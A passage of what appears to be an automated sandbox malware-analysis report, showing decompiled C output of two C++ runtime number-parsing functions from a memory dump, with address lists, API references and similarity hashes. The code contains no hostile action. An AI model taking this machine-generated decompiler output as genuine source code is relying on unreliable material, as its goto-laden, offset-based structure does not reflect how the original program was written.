				 *((intOrPtr*)(_t262 - 0x70)) =  *((intOrPtr*)(_t262 + 0x14));
				_t137 =  *(_t262 + 0x1c);
				 *(_t262 - 0x64) = _t137;
				_t138 = E6E19361B(_t196, __edi, __esi, _t263);
				_t250 = _t138;
				_t255 =  *((intOrPtr*)( *_t138 + 0x14));
				 *0x6e1ee1b4(_t262 - 0x5c, _t137);
				 *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x14))))();
				 *(_t262 - 4) =  *(_t262 - 4) & 0x00000000;
				_t264 =  *((intOrPtr*)(_t262 - 0x4c));
				if( *((intOrPtr*)(_t262 - 0x4c)) != 0) {
					 *((char*)(_t262 - 0x5e)) = E6E196B51(_t250);
				} else {
					 *((char*)(_t262 - 0x5e)) = 0;
				}
				_t143 = E6E1813A3(_t196, _t250, _t255, _t264);
				 *0x6e1ee1b4("0123456789ABCDEFabcdef-+Xx", 0x6e1ef6cb, _t262 - 0x2c,  *(_t262 - 0x64));
				 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 0x1c))))();
				_t257 =  *(_t262 - 0x6c);
				 *(_t262 - 0x68) = _t257;
				if(E6E192FE0(_t196,  *((intOrPtr*)(_t262 - 0x70))) == 0) {
					L13:
					_t259 =  *(_t262 + 0x18) & 0x00000e00;
					_t252 = 0xa;
					 *(_t262 - 0x64) = _t252;
					if(_t259 != 0x400) {
						__eflags = _t259 - 0x800;
						if(_t259 != 0x800) {
							asm("sbb esi, esi");
							_t261 =  ~_t259 & _t252;
							__eflags = _t261;
							L19:
							 *((char*)(_t262 - 0x5f)) = 0;
							if(E6E192FE0(_t196,  *((intOrPtr*)(_t262 - 0x70))) == 0) {
								L35:
								 *((char*)(_t262 - 0x5d)) = 0;
								 *((char*)(_t262 - 0x74)) = 0;
								__eflags = _t261;
								if(_t261 == 0) {
									L38:
									 *(_t262 - 0x34) =  *(_t262 - 0x34) & 0x00000000;
									 *((intOrPtr*)(_t262 - 0x30)) = 0xf;
									 *(_t262 - 0x44) = 0;
									E6E1958BE(_t262 - 0x44, 1,  *((intOrPtr*)(_t262 - 0x74)));
									_t253 = 0;
									 *(_t262 - 4) = 1;
									 *((intOrPtr*)(_t262 - 0x74)) =  *(_t262 - 0x6c) + 0x1f;
									_t154 = E6E192FE0(_t196,  *((intOrPtr*)(_t262 - 0x70)));
									_pop(_t215);
									if(_t154 == 0) {
										_t216 =  *((intOrPtr*)(_t262 - 0x30));
										_t155 =  *(_t262 - 0x44);
										L70:
										_t197 =  *((intOrPtr*)(_t262 - 0x5d));
										L71:
										_t244 = _t262 - 0x5c;
										if( *((intOrPtr*)(_t262 - 0x48)) >= 0x10) {
											_t244 =  *((intOrPtr*)(_t262 - 0x5c));
										}
										if(_t197 == 0) {
											L88:
											_t245 =  *(_t262 - 0x6c);
											goto L89;
										} else {
											while(_t253 != 0) {
												_t199 =  *_t244;
												if(_t199 == 0x7f) {
													break;
												}
												_t253 = _t253 - 1;
												if(_t253 == 0) {
													L80:
													if(_t253 != 0) {
														L84:
														if( *((char*)(_t244 + 1)) > 0) {
															_t244 = _t244 + 1;
														}
														continue;
													}
													 *(_t262 - 0x64) = _t262 - 0x44;
													if( *((intOrPtr*)(_t262 - 0x30)) >= 0x10) {
														 *(_t262 - 0x64) = _t155;
													}
													_t216 =  *((intOrPtr*)(_t262 - 0x30));
													if(_t199 <  *( *(_t262 - 0x64))) {
														goto L88;
													} else {
														goto L84;
													}
												}
												 *(_t262 - 0x64) = _t262 - 0x44;
												if( *((intOrPtr*)(_t262 - 0x30)) >= 0x10) {
													 *(_t262 - 0x64) = _t155;
												}
												_t216 =  *((intOrPtr*)(_t262 - 0x30));
												if(_t199 !=  *((intOrPtr*)( *(_t262 - 0x64) + _t253))) {
													goto L88;
												} else {
													goto L80;
												}
											}
											__eflags =  *((char*)(_t262 - 0x5f));
											_t245 =  *(_t262 - 0x68);
											if( *((char*)(_t262 - 0x5f)) == 0) {
												 *_t245 = 0x30;
												_t245 = _t245 + 1;
											}
											L89:
											 *_t245 = 0;
											__eflags = _t216 - 0x10;
											if(_t216 >= 0x10) {
												_t218 = _t216 + 1;
												 *(_t262 - 0x6c) = _t155;
												 *(_t262 - 0x64) = _t218;
												__eflags = _t218 - 0x1000;
												if(_t218 >= 0x1000) {
													E6E1616BA(0, _t253, _t262, _t262 - 0x6c, _t262 - 0x64);
													_t155 =  *(_t262 - 0x6c);
													_t218 =  *(_t262 - 0x64);
												}
												_push(_t218);
												E6E1A99DB(_t155);
											}
											 *(_t262 - 0x34) = 0;
											 *((intOrPtr*)(_t262 - 0x30)) = 0xf;
											 *(_t262 - 0x44) = 0;
											E6E17FB57(_t262 - 0x5c);
											return E6E1A9D9D(_t261, 0, _t253, _t261);
										}
									} else {
										goto L39;
									}
									do {
										L39:
										if( *((char*)(_t196 + 4)) == 0) {
											_t215 = _t196;
											E6E19573D(_t196);
										}
										 *((intOrPtr*)(_t262 - 0x78)) =  *((intOrPtr*)(_t196 + 5));
										_t165 = E6E192FF6(_t215, _t262 - 0x2c,  *((intOrPtr*)(_t196 + 5)));
										if(_t165 >=  *(_t262 - 0x64)) {
											_t216 =  *((intOrPtr*)(_t262 - 0x30));
											_t246 = _t262 - 0x44;
											_t155 =  *(_t262 - 0x44);
											__eflags = _t216 - 0x10;
											if(_t216 >= 0x10) {
												_t246 = _t155;
											}
											__eflags =  *((char*)(_t246 + _t253));
											if( *((char*)(_t246 + _t253)) == 0) {
												L63:
												if(_t253 == 0) {
													goto L70;
												}
												_t247 = _t262 - 0x44;
												if(_t216 >= 0x10) {
													_t247 = _t155;
												}
												if( *((char*)(_t247 + _t253)) <= 0) {
													_t197 = 0;
													goto L71;
												} else {
													_t253 = _t253 + 1;
													goto L70;
												}
											} else {
												__eflags =  *((char*)(_t262 - 0x5e));
												if( *((char*)(_t262 - 0x5e)) == 0) {
													goto L63;
												}
												__eflags =  *((char*)(_t196 + 4));
												if( *((char*)(_t196 + 4)) != 0) {
													_t248 =  *((intOrPtr*)(_t262 - 0x78));
												} else {
													E6E19573D(_t196);
													_t248 =  *((intOrPtr*)(_t196 + 5));
													_t216 =  *((intOrPtr*)(_t262 - 0x30));
													_t155 =  *(_t262 - 0x44);
												}
												__eflags = _t248 -  *((intOrPtr*)(_t262 - 0x5e));
												if(_t248 !=  *((intOrPtr*)(_t262 - 0x5e))) {
													goto L63;
												} else {
													E6E183F1C(_t262 - 0x44, 0);
													_t253 = _t253 + 1;
													__eflags = _t253;
													goto L61;
												}
											}
										} else {
											_t233 =  *((intOrPtr*)(_t165 + "0123456789ABCDEFabcdef-+Xx"));
											_t171 =  *(_t262 - 0x68);
											 *_t171 = _t233;
											if( *((char*)(_t262 - 0x5f)) != 0 || _t233 != 0x30) {
												if(_t171 <  *((intOrPtr*)(_t262 - 0x74))) {
													 *((char*)(_t262 - 0x5f)) = 1;
													 *(_t262 - 0x68) = _t171 + 1;
												}
											}
											_t172 = _t262 - 0x44;
											 *((char*)(_t262 - 0x5d)) = 1;
											if( *((intOrPtr*)(_t262 - 0x30)) >= 0x10) {
												_t172 =  *(_t262 - 0x44);
											}
											if( *((char*)(_t172 + _t253)) != 0x7f) {
												_t173 = _t262 - 0x44;
												if( *((intOrPtr*)(_t262 - 0x30)) >= 0x10) {
													_t173 =  *(_t262 - 0x44);
												}
												 *((char*)(_t173 + _t253)) =  *((char*)(_t173 + _t253)) + 1;
											}
										}
										L61:
										E6E194F2D(_t196);
										_t168 = E6E192FE0(_t196,  *((intOrPtr*)(_t262 - 0x70)));
										_pop(_t215);
									} while (_t168 != 0);
									_t216 =  *((intOrPtr*)(_t262 - 0x30));
									_t155 =  *(_t262 - 0x44);
									goto L63;
								}
								L36:
								__eflags = _t261 - _t252;
								if(_t261 == _t252) {
									goto L38;
								}
								L37:
								 *(_t262 - 0x64) = ((0 | _t261 != 0x00000008) - 0x00000001 & 0xfffffff2) + 0x16;
								goto L38;
							}
							if( *((char*)(_t196 + 4)) == 0) {
								E6E19573D(_t196);
							}
							if( *((intOrPtr*)(_t196 + 5)) !=  *((intOrPtr*)(_t262 - 0x2c))) {
								goto L35;
							} else {
								 *((char*)(_t262 - 0x5d)) = 1;
								 *((char*)(_t262 - 0x74)) = 1;
								E6E194F2D(_t196);
								E6E192FE0(_t196,  *((intOrPtr*)(_t262 - 0x70)));
								if(1 == 0) {
									L33:
									__eflags = _t261;
									if(_t261 != 0) {
										goto L36;
									}
									_t261 = 8;
									goto L37;
								}
								if( *((char*)(_t196 + 4)) == 0) {
									E6E19573D(_t196);
								}
								_t184 =  *((intOrPtr*)(_t196 + 5));
								if(_t184 ==  *((intOrPtr*)(_t262 - 0x13))) {
									L30:
									if(_t261 == 0 || _t261 == 0x10) {
										_t261 = 0x10;
										 *((char*)(_t262 - 0x5d)) = 0;
										 *((char*)(_t262 - 0x74)) = 0;
										E6E194F2D(_t196);
										goto L37;
									} else {
										goto L36;
									}
								} else {
									if( *((char*)(_t196 + 4)) == 0) {
										E6E19573D(_t196);
										_t184 =  *((intOrPtr*)(_t196 + 5));
									}
									if(_t184 !=  *((intOrPtr*)(_t262 - 0x14))) {
										goto L33;
									} else {
										goto L30;
									}
								}
							}
						}
						_push(0x10);
						L17:
						_pop(_t261);
						goto L19;
					}
					_push(8);
					goto L17;
				} else {
					if( *((char*)(_t196 + 4)) == 0) {
						E6E19573D(_t196);
					}
					_t190 =  *((intOrPtr*)(_t196 + 5));
					if(_t190 !=  *((intOrPtr*)(_t262 - 0x15))) {
						__eflags =  *((char*)(_t196 + 4));
						if( *((char*)(_t196 + 4)) == 0) {
							E6E19573D(_t196);
							_t190 =  *((intOrPtr*)(_t196 + 5));
						}
						__eflags = _t190 -  *((intOrPtr*)(_t262 - 0x16));
						if(_t190 !=  *((intOrPtr*)(_t262 - 0x16))) {
							goto L13;
						} else {
							 *_t257 = 0x2d;
							goto L12;
						}
					} else {
						 *_t257 = 0x2b;
						L12:
						 *(_t262 - 0x68) = _t257 + 1;
						E6E194F2D(_t196);
						goto L13;
					}
				}
			}

0x6e194aee
0x6e194af5
0x6e194afd
0x6e194b00
0x6e194b06
0x6e194b09
0x6e194b0d
0x6e194b10
0x6e194b15
0x6e194b1e
0x6e194b23
0x6e194b2b
0x6e194b2d
0x6e194b31
0x6e194b35
0x6e194b44
0x6e194b37
0x6e194b37
0x6e194b37
0x6e194b4a
0x6e194b67
0x6e194b6f
0x6e194b74
0x6e194b7a
0x6e194b86
0x6e194bc7
0x6e194bcc
0x6e194bd2
0x6e194bd3
0x6e194bdc
0x6e194be2
0x6e194be8
0x6e194bf1
0x6e194bf3
0x6e194bf3
0x6e194bf5
0x6e194bf8
0x6e194c06
0x6e194c8f
0x6e194c91
0x6e194c94
0x6e194c97
0x6e194c99
0x6e194cb1
0x6e194cb4
0x6e194cbd
0x6e194cc4
0x6e194cc8
0x6e194cd0
0x6e194cd8
0x6e194cdd
0x6e194ce0
0x6e194ce6
0x6e194ce9
0x6e194ddf
0x6e194de2
0x6e194de5
0x6e194de5
0x6e194de8
0x6e194dec
0x6e194def
0x6e194df1
0x6e194df1
0x6e194df6
0x6e194e57
0x6e194e57
0x00000000
0x6e194df8
0x6e194df8
0x6e194dfc
0x6e194e01
0x00000000
0x00000000
0x6e194e03
0x6e194e06
0x6e194e22
0x6e194e24
0x6e194e3f
0x6e194e43
0x6e194e45
0x6e194e45
0x00000000
0x6e194e43
0x6e194e2d
0x6e194e30
0x6e194e32
0x6e194e32
0x6e194e3a
0x6e194e3d
0x00000000
0x00000000
0x00000000
0x00000000
0x6e194e3d
0x6e194e0f
0x6e194e12
0x6e194e14
0x6e194e14
0x6e194e1d
0x6e194e20
0x00000000
0x00000000
0x00000000
0x00000000
0x6e194e20
0x6e194e48
0x6e194e4c
0x6e194e4f
0x6e194e51
0x6e194e54
0x6e194e54
0x6e194e5a
0x6e194e5c
0x6e194e5e
0x6e194e61
0x6e194e63
0x6e194e64
0x6e194e67
0x6e194e6a
0x6e194e70
0x6e194e7a
0x6e194e7f
0x6e194e84
0x6e194e84
0x6e194e87
0x6e194e89
0x6e194e8f
0x6e194e93
0x6e194e96
0x6e194e9d
0x6e194ea0
0x6e194eac
0x6e194eac
0x00000000
0x00000000
0x00000000
0x6e194cef
0x6e194cef
0x6e194cf3
0x6e194cf5
0x6e194cf7
0x6e194cf7
0x6e194d00
0x6e194d07
0x6e194d11
0x6e194d5d
0x6e194d60
0x6e194d63
0x6e194d66
0x6e194d69
0x6e194d6b
0x6e194d6b
0x6e194d6d
0x6e194d71
0x6e194dc4
0x6e194dc6
0x00000000
0x00000000
0x6e194dc8
0x6e194dce
0x6e194dd0
0x6e194dd0
0x6e194dd6
0x6e194ddb
0x00000000
0x6e194dd8
0x6e194dd8
0x00000000
0x6e194dd8
0x6e194d73
0x6e194d73
0x6e194d77
0x00000000
0x00000000
0x6e194d79
0x6e194d7d
0x6e194d91
0x6e194d7f
0x6e194d81
0x6e194d86
0x6e194d89
0x6e194d8c
0x6e194d8c
0x6e194d94
0x6e194d97
0x00000000
0x6e194d99
0x6e194d9e
0x6e194da3
0x6e194da3
0x00000000
0x6e194da3
0x6e194d97
0x6e194d13
0x6e194d17
0x6e194d1d
0x6e194d20
0x6e194d22
0x6e194d2c
0x6e194d2f
0x6e194d33
0x6e194d33
0x6e194d2c
0x6e194d3a
0x6e194d3d
0x6e194d41
0x6e194d43
0x6e194d43
0x6e194d4a
0x6e194d50
0x6e194d53
0x6e194d55
0x6e194d55
0x6e194d58
0x6e194d58
0x6e194d4a
0x6e194da4
0x6e194da6
0x6e194daf
0x6e194db5
0x6e194db6
0x6e194dbe
0x6e194dc1
0x00000000
0x6e194dc1
0x6e194c9b
0x6e194c9b
0x6e194c9d
0x00000000
0x00000000
0x6e194c9f
0x6e194cae
0x00000000
0x6e194cae
0x6e194c10
0x6e194c14
0x6e194c14
0x6e194c1f
0x00000000
0x6e194c21
0x6e194c25
0x6e194c28
0x6e194c2b
0x6e194c34
0x6e194c3d
0x6e194c86
0x6e194c86
0x6e194c88
0x00000000
0x00000000
0x6e194c8c
0x00000000
0x6e194c8c
0x6e194c43
0x6e194c47
0x6e194c47
0x6e194c4c
0x6e194c52
0x6e194c69
0x6e194c6b
0x6e194c78
0x6e194c79
0x6e194c7c
0x6e194c7f
0x00000000
0x00000000
0x00000000
0x00000000
0x6e194c54
0x6e194c58
0x6e194c5c
0x6e194c61
0x6e194c61
0x6e194c67
0x00000000
0x00000000
0x00000000
0x00000000
0x6e194c67
0x6e194c52
0x6e194c1f
0x6e194bea
0x6e194bec
0x6e194bec
0x00000000
0x6e194bec
0x6e194bde
0x00000000
0x6e194b88
0x6e194b8c
0x6e194b90
0x6e194b90
0x6e194b95
0x6e194b9b
0x6e194ba2
0x6e194ba6
0x6e194baa
0x6e194baf
0x6e194baf
0x6e194bb2
0x6e194bb5
0x00000000
0x6e194bb7
0x6e194bb7
0x00000000
0x6e194bb7
0x6e194b9d
0x6e194b9d
0x6e194bba
0x6e194bbf
0x6e194bc2
0x00000000
0x6e194bc2
0x6e194b9b

APIs

__EH_prolog3_GS.LIBCMT ref: 6E194AF5

Part of subcall function 6E19361B: __EH_prolog3.LIBCMT ref: 6E193622
Part of subcall function 6E19361B: std::_Lockit::_Lockit.LIBCPMT ref: 6E19362C
Part of subcall function 6E19361B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E19369D

_Find_elem.LIBCPMT ref: 6E194D07

Strings

0123456789ABCDEFabcdef-+Xx, xrefs: 6E194B5D

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
String ID: 0123456789ABCDEFabcdef-+Xx
API String ID: 2544715827-2799312399
Opcode ID: e0a5a96982b718d0cb0fc529ca1b3b4ccf35e3431f289e9ce3210e24ff6f6191
Instruction ID: ef5f665ec090b31035121465ba3b72adc2aa58fb067098b6465985b2c6f3f7ec
Opcode Fuzzy Hash: e0a5a96982b718d0cb0fc529ca1b3b4ccf35e3431f289e9ce3210e24ff6f6191
Instruction Fuzzy Hash: 41D1EE35E082898EEF15CFE8C4D0BDCBBB6AF16304F644459D4A56B286DB3499C6FB10

Uniqueness

Uniqueness Score: -1.00%

Function 6E19D700, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 347
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E19D700(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t137;
				intOrPtr* _t138;
				signed short _t141;
				intOrPtr* _t143;
				void* _t154;
				signed int _t155;
				void* _t165;
				void* _t168;
				signed int _t171;
				void* _t172;
				void* _t173;
				signed int _t184;
				signed int _t190;
				intOrPtr _t196;
				intOrPtr _t197;
				intOrPtr _t199;
				intOrPtr _t216;
				signed int _t218;
				intOrPtr _t233;
				void* _t244;
				intOrPtr* _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t253;
				signed int _t254;
				signed int _t258;
				signed int _t260;
				signed int _t262;
				void* _t263;
				void* _t264;

				_t264 = __eflags;
				_t244 = __edx;
				E6E1A9DF3(0x6e1ecdb4, __ebx, __edi, __esi, 0x88);
				_t196 =  *((intOrPtr*)(_t263 + 0x10));
				 *(_t263 - 0x88) =  *(_t263 + 0xc);
				 *((intOrPtr*)(_t263 - 0x8c)) =  *((intOrPtr*)(_t263 + 0x14));
				_t137 =  *(_t263 + 0x1c);
				 *(_t263 - 0x80) = _t137;
				_t138 = E6E182379(_t196, _t244, __edi, __esi, _t264);
				_t251 = _t138;
				_t256 =  *((intOrPtr*)( *_t138 + 0x14));
				 *0x6e1ee1b4(_t263 - 0x78, _t137);
				_t141 =  *((intOrPtr*)( *((intOrPtr*)( *_t138 + 0x14))))();
				 *(_t263 - 4) =  *(_t263 - 4) & 0x00000000;
				_t265 =  *((intOrPtr*)(_t263 - 0x68));
				if( *((intOrPtr*)(_t263 - 0x68)) != 0) {
					E6E1623F9();
					 *(_t263 - 0x94) = _t141 & 0x0000ffff;
				} else {
					 *(_t263 - 0x94) =  *(_t263 - 0x94) & 0x00000000;
				}
				_t143 = E6E1826F0(_t196, _t244, _t251, _t256, _t265);
				 *0x6e1ee1b4("0123456789ABCDEFabcdef-+Xx", 0x6e1f2443, _t263 - 0x48,  *(_t263 - 0x80));
				 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 0x2c))))();
				_t258 =  *(_t263 - 0x88);
				 *(_t263 - 0x84) = _t258;
				if(E6E1979C2(_t196,  *((intOrPtr*)(_t263 - 0x8c))) == 0) {
					L13:
					_t260 =  *(_t263 + 0x18) & 0x00000e00;
					_t253 = 0xa;
					 *(_t263 - 0x80) = _t253;
					if(_t260 != 0x400) {
						__eflags = _t260 - 0x800;
						if(_t260 != 0x800) {
							asm("sbb esi, esi");
							_t262 =  ~_t260 & _t253;
							__eflags = _t262;
							L19:
							 *((char*)(_t263 - 0x7a)) = 0;
							if(E6E1979C2(_t196,  *((intOrPtr*)(_t263 - 0x8c))) == 0) {
								L35:
								 *((char*)(_t263 - 0x79)) = 0;
								 *((char*)(_t263 - 0x90)) = 0;
								__eflags = _t262;
								if(_t262 == 0) {
									L38:
									 *(_t263 - 0x50) =  *(_t263 - 0x50) & 0x00000000;
									 *((intOrPtr*)(_t263 - 0x4c)) = 0xf;
									 *(_t263 - 0x60) = 0;
									E6E1958BE(_t263 - 0x60, 1,  *((intOrPtr*)(_t263 - 0x90)));
									_t254 = 0;
									 *(_t263 - 4) = 1;
									 *((intOrPtr*)(_t263 - 0x90)) =  *(_t263 - 0x88) + 0x1f;
									_t154 = E6E1979C2(_t196,  *((intOrPtr*)(_t263 - 0x8c)));
									_pop(_t215);
									if(_t154 == 0) {
										_t216 =  *((intOrPtr*)(_t263 - 0x4c));
										_t155 =  *(_t263 - 0x60);
										L69:
										_t197 =  *((intOrPtr*)(_t263 - 0x79));
										L70:
										_t245 = _t263 - 0x78;
										if( *((intOrPtr*)(_t263 - 0x64)) >= 0x10) {
											_t245 =  *((intOrPtr*)(_t263 - 0x78));
										}
										if(_t197 == 0) {
											L87:
											_t246 =  *(_t263 - 0x88);
											goto L88;
										} else {
											while(_t254 != 0) {
												_t199 =  *_t245;
												if(_t199 == 0x7f) {
													break;
												}
												_t254 = _t254 - 1;
												if(_t254 == 0) {
													L79:
													if(_t254 != 0) {
														L83:
														if( *((char*)(_t245 + 1)) > 0) {
															_t245 = _t245 + 1;
														}
														continue;
													}
													 *(_t263 - 0x80) = _t263 - 0x60;
													if( *((intOrPtr*)(_t263 - 0x4c)) >= 0x10) {
														 *(_t263 - 0x80) = _t155;
													}
													_t216 =  *((intOrPtr*)(_t263 - 0x4c));
													if(_t199 <  *( *(_t263 - 0x80))) {
														goto L87;
													} else {
														goto L83;
													}
												}
												 *(_t263 - 0x80) = _t263 - 0x60;
												if( *((intOrPtr*)(_t263 - 0x4c)) >= 0x10) {
													 *(_t263 - 0x80) = _t155;
												}
												_t216 =  *((intOrPtr*)(_t263 - 0x4c));
												if(_t199 !=  *((intOrPtr*)( *(_t263 - 0x80) + _t254))) {
													goto L87;
												} else {
													goto L79;
												}
											}
											__eflags =  *((char*)(_t263 - 0x7a));
											_t246 =  *(_t263 - 0x84);
											if( *((char*)(_t263 - 0x7a)) == 0) {
												 *_t246 = 0x30;
												_t246 = _t246 + 1;
											}
											L88:
											 *_t246 = 0;
											__eflags = _t216 - 0x10;
											if(_t216 >= 0x10) {
												_t218 = _t216 + 1;
												 *(_t263 - 0x88) = _t155;
												 *(_t263 - 0x80) = _t218;
												__eflags = _t218 - 0x1000;
												if(_t218 >= 0x1000) {
													E6E1616BA(0, _t254, _t263, _t263 - 0x88, _t263 - 0x80);
													_t155 =  *(_t263 - 0x88);
													_t218 =  *(_t263 - 0x80);
												}
												_push(_t218);
												E6E1A99DB(_t155);
											}
											 *(_t263 - 0x50) = 0;
											 *((intOrPtr*)(_t263 - 0x4c)) = 0xf;
											 *(_t263 - 0x60) = 0;
											E6E17FB57(_t263 - 0x78);
											return E6E1A9D9D(_t262, 0, _t254, _t262);
										}
									} else {
										goto L39;
									}
									do {
										L39:
										if( *((char*)(_t196 + 4)) == 0) {
											_t215 = _t196;
											E6E1A04F4(_t196);
										}
										_t165 = E6E197A43(_t215, _t263 - 0x48,  *(_t196 + 6) & 0x0000ffff);
										if(_t165 >=  *(_t263 - 0x80)) {
											_t216 =  *((intOrPtr*)(_t263 - 0x4c));
											_t247 = _t263 - 0x60;
											_t155 =  *(_t263 - 0x60);
											__eflags = _t216 - 0x10;
											if(_t216 >= 0x10) {
												_t247 = _t155;
											}
											__eflags =  *((char*)(_t247 + _t254));
											if( *((char*)(_t247 + _t254)) == 0) {
												L62:
												if(_t254 == 0) {
													goto L69;
												}
												_t248 = _t263 - 0x60;
												if(_t216 >= 0x10) {
													_t248 = _t155;
												}
												if( *((char*)(_t248 + _t254)) <= 0) {
													_t197 = 0;
													goto L70;
												} else {
													_t254 = _t254 + 1;
													goto L69;
												}
											} else {
												__eflags =  *(_t263 - 0x94);
												if( *(_t263 - 0x94) == 0) {
													goto L62;
												}
												__eflags =  *((char*)(_t196 + 4));
												_t249 =  *(_t196 + 6) & 0x0000ffff;
												if( *((char*)(_t196 + 4)) == 0) {
													E6E1A04F4(_t196);
													_t249 =  *(_t196 + 6) & 0x0000ffff;
													_t216 =  *((intOrPtr*)(_t263 - 0x4c));
													_t155 =  *(_t263 - 0x60);
												}
												__eflags = _t249 -  *(_t263 - 0x94);
												if(_t249 !=  *(_t263 - 0x94)) {
													goto L62;
												} else {
													E6E183F1C(_t263 - 0x60, 0);
													_t254 = _t254 + 1;
													__eflags = _t254;
													goto L60;
												}
											}
										} else {
											_t233 =  *((intOrPtr*)(_t165 + "0123456789ABCDEFabcdef-+Xx"));
											_t171 =  *(_t263 - 0x84);
											 *_t171 = _t233;
											if( *((char*)(_t263 - 0x7a)) != 0 || _t233 != 0x30) {
												if(_t171 <  *((intOrPtr*)(_t263 - 0x90))) {
													 *((char*)(_t263 - 0x7a)) = 1;
													 *(_t263 - 0x84) = _t171 + 1;
												}
											}
											_t172 = _t263 - 0x60;
											 *((char*)(_t263 - 0x79)) = 1;
											if( *((intOrPtr*)(_t263 - 0x4c)) >= 0x10) {
												_t172 =  *(_t263 - 0x60);
											}
											if( *((char*)(_t172 + _t254)) != 0x7f) {
												_t173 = _t263 - 0x60;
												if( *((intOrPtr*)(_t263 - 0x4c)) >= 0x10) {
													_t173 =  *(_t263 - 0x60);
												}
												 *((char*)(_t173 + _t254)) =  *((char*)(_t173 + _t254)) + 1;
											}
										}
										L60:
										E6E19F3B2(_t196);
										_t168 = E6E1979C2(_t196,  *((intOrPtr*)(_t263 - 0x8c)));
										_pop(_t215);
									} while (_t168 != 0);
									_t216 =  *((intOrPtr*)(_t263 - 0x4c));
									_t155 =  *(_t263 - 0x60);
									goto L62;
								}
								L36:
								__eflags = _t262 - _t253;
								if(_t262 == _t253) {
									goto L38;
								}
								L37:
								 *(_t263 - 0x80) = ((0 | _t262 != 0x00000008) - 0x00000001 & 0xfffffff2) + 0x16;
								goto L38;
							}
							if( *((char*)(_t196 + 4)) == 0) {
								E6E1A04F4(_t196);
							}
							if(( *(_t196 + 6) & 0x0000ffff) !=  *((intOrPtr*)(_t263 - 0x48))) {
								goto L35;
							} else {
								 *((char*)(_t263 - 0x79)) = 1;
								 *((char*)(_t263 - 0x90)) = 1;
								E6E19F3B2(_t196);
								E6E1979C2(_t196,  *((intOrPtr*)(_t263 - 0x8c)));
								if(1 == 0) {
									L33:
									__eflags = _t262;
									if(_t262 != 0) {
										goto L36;
									}
									_t262 = 8;
									goto L37;
								}
								if( *((char*)(_t196 + 4)) == 0) {
									E6E1A04F4(_t196);
								}
								_t184 =  *(_t196 + 6) & 0x0000ffff;
								if(_t184 ==  *((intOrPtr*)(_t263 - 0x16))) {
									L30:
									if(_t262 == 0 || _t262 == 0x10) {
										_t262 = 0x10;
										 *((char*)(_t263 - 0x79)) = 0;
										 *((char*)(_t263 - 0x90)) = 0;
										E6E19F3B2(_t196);
										goto L37;
									} else {
										goto L36;
									}
								} else {
									if( *((char*)(_t196 + 4)) == 0) {
										E6E1A04F4(_t196);
										_t184 =  *(_t196 + 6) & 0x0000ffff;
									}
									if(_t184 !=  *((intOrPtr*)(_t263 - 0x18))) {
										goto L33;
									} else {
										goto L30;
									}
								}
							}
						}
						_push(0x10);
						L17:
						_pop(_t262);
						goto L19;
					}
					_push(8);
					goto L17;
				} else {
					if( *((char*)(_t196 + 4)) == 0) {
						E6E1A04F4(_t196);
					}
					_t190 =  *(_t196 + 6) & 0x0000ffff;
					if(_t190 !=  *((intOrPtr*)(_t263 - 0x1a))) {
						__eflags =  *((char*)(_t196 + 4));
						if( *((char*)(_t196 + 4)) == 0) {
							E6E1A04F4(_t196);
							_t190 =  *(_t196 + 6) & 0x0000ffff;
						}
						__eflags = _t190 -  *((intOrPtr*)(_t263 - 0x1c));
						if(_t190 !=  *((intOrPtr*)(_t263 - 0x1c))) {
							goto L13;
						} else {
							 *_t258 = 0x2d;
							goto L12;
						}
					} else {
						 *_t258 = 0x2b;
						L12:
						 *(_t263 - 0x84) = _t258 + 1;
						E6E19F3B2(_t196);
						goto L13;
					}
				}
			}

0x6e19d700
0x6e19d700
0x6e19d70a
0x6e19d712
0x6e19d715
0x6e19d71e
0x6e19d724
0x6e19d728
0x6e19d72b
0x6e19d730
0x6e19d739
0x6e19d73e
0x6e19d746
0x6e19d748
0x6e19d74c
0x6e19d750
0x6e19d75d
0x6e19d765
0x6e19d752
0x6e19d752
0x6e19d752
0x6e19d76e
0x6e19d78b
0x6e19d793
0x6e19d79b
0x6e19d7a4
0x6e19d7b3
0x6e19d7fb
0x6e19d800
0x6e19d806
0x6e19d807
0x6e19d810
0x6e19d816
0x6e19d81c
0x6e19d825
0x6e19d827
0x6e19d827
0x6e19d829
0x6e19d82f
0x6e19d83d
0x6e19d8d5
0x6e19d8d7
0x6e19d8da
0x6e19d8e0
0x6e19d8e2
0x6e19d8fa
0x6e19d900
0x6e19d909
0x6e19d910
0x6e19d914
0x6e19d91f
0x6e19d92a
0x6e19d92f
0x6e19d935
0x6e19d93b
0x6e19d93e
0x6e19da46
0x6e19da49
0x6e19da4c
0x6e19da4c
0x6e19da4f
0x6e19da53
0x6e19da56
0x6e19da58
0x6e19da58
0x6e19da5d
0x6e19dac1
0x6e19dac1
0x00000000
0x6e19da5f
0x6e19da5f
0x6e19da63
0x6e19da68
0x00000000
0x00000000
0x6e19da6a
0x6e19da6d
0x6e19da89
0x6e19da8b
0x6e19daa6
0x6e19daaa
0x6e19daac
0x6e19daac
0x00000000
0x6e19daaa
0x6e19da94
0x6e19da97
0x6e19da99
0x6e19da99
0x6e19daa1
0x6e19daa4
0x00000000
0x00000000
0x00000000
0x00000000
0x6e19daa4
0x6e19da76
0x6e19da79
0x6e19da7b
0x6e19da7b
0x6e19da84
0x6e19da87
0x00000000
0x00000000
0x00000000
0x00000000
0x6e19da87
0x6e19daaf
0x6e19dab3
